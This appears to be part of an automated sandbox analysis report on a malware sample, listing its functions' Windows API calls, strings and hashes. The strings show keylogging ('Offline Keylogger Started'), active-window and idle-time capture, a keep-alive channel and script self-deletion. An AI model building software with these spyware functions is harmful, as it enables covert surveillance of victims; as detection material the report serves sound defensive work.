                                                                                                                                                                    Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2403171778-0
                                                                                                                                                                    • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                                                                                                                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                                                                                                                                    • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                                                                                                                                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0040AD49
                                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                                                                                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                    • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                    • API String ID: 911427763-3954389425
                                                                                                                                                                    • Opcode ID: 597c911e194a9f8b730567eb419a0c1f24f4904ea4c2c510c10553a390452173
                                                                                                                                                                    • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                                                                                                                                    • Opcode Fuzzy Hash: 597c911e194a9f8b730567eb419a0c1f24f4904ea4c2c510c10553a390452173
                                                                                                                                                                    • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                    • API String ID: 82841172-425784914
                                                                                                                                                                    • Opcode ID: 09899184fdc2fd004cb41772b916fb4fd362db7da6a6830410f471f7de6dd567
                                                                                                                                                                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                                                                                                                    • Opcode Fuzzy Hash: 09899184fdc2fd004cb41772b916fb4fd362db7da6a6830410f471f7de6dd567
                                                                                                                                                                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                                                                                                                                                    • String ID: hpF
                                                                                                                                                                    • API String ID: 1087594267-151379673
                                                                                                                                                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                                                                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                                                                                                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                                                                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                                                                      • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                                                                                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                                                                                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                                                                                                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                    • API String ID: 782494840-2070987746
                                                                                                                                                                    • Opcode ID: d33b3aadf870e2a3d5ddb7e0db64bdc32883f42ff5325d09c6e3b3a72a78e76a
                                                                                                                                                                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                                                                                                                    • Opcode Fuzzy Hash: d33b3aadf870e2a3d5ddb7e0db64bdc32883f42ff5325d09c6e3b3a72a78e76a
                                                                                                                                                                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274CC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(274CC7DD), ref: 274CC7E6
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,274CC7DD), ref: 274CC838
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 274CC860
                                                                                                                                                                      • Part of subcall function 274CC803: GetProcAddress.KERNEL32(00000000,274CC7F4), ref: 274CC804
                                                                                                                                                                      • Part of subcall function 274CC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC816
                                                                                                                                                                      • Part of subcall function 274CC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC82A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                    • Instruction ID: f284350c3468f4c44a676d5d5489e5673351a030092d9639ae33423f15596774
                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                    • Instruction Fuzzy Hash: 4F01F928947241B8AB12D6740E01DFB5FD89B67A63B101B9EE240C72B3D950C706C3F6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                                                                                                                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ChangeCloseCreateFindNotificationSizeSleep
                                                                                                                                                                    • String ID: XQG
                                                                                                                                                                    • API String ID: 4068920109-3606453820
                                                                                                                                                                    • Opcode ID: 160462e11ef34f9525cf4e0b02e45729865881322322681307b1e70152f06eb0
                                                                                                                                                                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                                                                                                                    • Opcode Fuzzy Hash: 160462e11ef34f9525cf4e0b02e45729865881322322681307b1e70152f06eb0
                                                                                                                                                                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274CC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,274CC7DD), ref: 274CC838
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 274CC860
                                                                                                                                                                      • Part of subcall function 274CC7E6: GetModuleHandleA.KERNEL32(274CC7DD), ref: 274CC7E6
                                                                                                                                                                      • Part of subcall function 274CC7E6: GetProcAddress.KERNEL32(00000000,274CC7F4), ref: 274CC804
                                                                                                                                                                      • Part of subcall function 274CC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC816
                                                                                                                                                                      • Part of subcall function 274CC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC82A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                    • Instruction ID: ba9a10d023c54737ac7bbe8275a284b0854af87b25cebd2f5bea34fbbb1530fc
                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                    • Instruction Fuzzy Hash: F921277944B281AFEB12CB744D00AE76FD89B53662F180A9ED140CB263D5A88746C3B6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041C510,00000000,00000000,?), ref: 0041C430
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A8E7,?,00000000,00000000), ref: 0041C44D
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,0040A8E7,?,00000000,00000000), ref: 0041C459
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A8E7,?,00000000,00000000), ref: 0041C46A
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,0040A8E7,?,00000000,00000000), ref: 0041C477
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1087594267-0
                                                                                                                                                                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                                                                                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                                                                                                                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                                                                                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274CC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,274CC7F4), ref: 274CC804
                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC816
                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,274CC7F4,274CC7DD), ref: 274CC82A
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,274CC7DD), ref: 274CC838
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 274CC860
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                    • Instruction ID: c29bde4569c61d98e9b6f390dd59a5ca70510856732b3a4caaaef978b86e8a1d
                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                    • Instruction Fuzzy Hash: 93F0F669587340BCFA12C6B41E41EF75FCC8B67663B101A5EE200C73A3D895870683F6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CountEventTick
                                                                                                                                                                    • String ID: !D@$NG
                                                                                                                                                                    • API String ID: 180926312-2721294649
                                                                                                                                                                    • Opcode ID: 7d01a5ab84d0564d86ffae43eb523a0b345e9c92a79071e0b51248b8e8200ff1
                                                                                                                                                                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d01a5ab84d0564d86ffae43eb523a0b345e9c92a79071e0b51248b8e8200ff1
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A
                                                                                                                                                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                                                                                                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                    • String ID: Offline Keylogger Started
                                                                                                                                                                    • API String ID: 465354869-4114347211
                                                                                                                                                                    • Opcode ID: 2c19bd04d36dc34c7690185316a0ca742d4447cd05569385128c134b60368c61
                                                                                                                                                                    • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                                                                                                                                    • Opcode Fuzzy Hash: 2c19bd04d36dc34c7690185316a0ca742d4447cd05569385128c134b60368c61
                                                                                                                                                                    • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                                                    Strings
                                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Create$EventLocalThreadTime
                                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                    • API String ID: 2532271599-1507639952
                                                                                                                                                                    • Opcode ID: 9be3b9cd4f1e69574a077c84422ddbca642c9eab9663484e0004004cf1949375
                                                                                                                                                                    • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                                                                                                                                    • Opcode Fuzzy Hash: 9be3b9cd4f1e69574a077c84422ddbca642c9eab9663484e0004004cf1949375
                                                                                                                                                                    • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
